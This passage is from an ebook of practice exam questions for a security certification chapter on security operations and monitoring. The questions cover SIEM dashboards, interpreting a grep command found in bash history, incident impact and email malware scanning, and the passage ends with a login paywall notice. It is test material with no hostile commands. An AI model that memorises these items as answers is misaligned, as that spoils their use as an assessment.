1. The immediate impact on operations so that his team can restore functionality
2. The total impact of the event so that his team can provide an accurate final report
3. The immediate impact on operations so that his team can identify the likely threat actor
4. The total impact of the event so that his team can build a new threat model for future use
Kathleen wants to ensure that her team of security analysts sees important information about the security status of her organization whenever they log in to the SIEM. What part of a SIEM is designed to provide at-a-glance status information?
1. The reporting engine
2. Email reports
3. The dashboard
4. The ruleset
Lucca is reviewing bash command history logs on a system that he suspects may have been used as part of a breach. He discovers the following grep command run inside of the /users directory by an administrative user. What will the command find?
```
Grep -r "sudo" /home/users/ | grep "bash.log" 
```
1. All occurrences of the sudo command on the system
2. All occurrences of root logins by users
3. All occurrences of the sudo command in bash log files in user home directories
4. All lines that do not contain the word sudo or bash.log in user directories
Munju wants to test her organization's email for malicious payloads. What type of tool should she select to perform this action?
1. An antimalware tool
2. A hashing algorithm
3. An IPS
4. A UEBA

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.

Table of Contents for Chapter 3: Domain 3.0: Security Operations and Monitoring

Create new playlist

Sign In

Sign Up

Table of Contents for
Chapter 3: Domain 3.0: Security Operations and Monitoring